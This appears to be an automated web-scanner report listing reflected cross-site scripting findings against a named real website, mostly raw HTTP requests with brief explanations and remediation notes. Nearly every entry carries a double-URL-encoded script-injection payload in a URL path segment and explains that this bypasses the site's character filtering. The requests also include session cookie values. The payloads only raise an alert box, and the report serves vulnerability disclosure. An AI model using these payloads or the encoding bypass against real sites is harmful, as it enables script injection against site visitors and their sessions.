GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
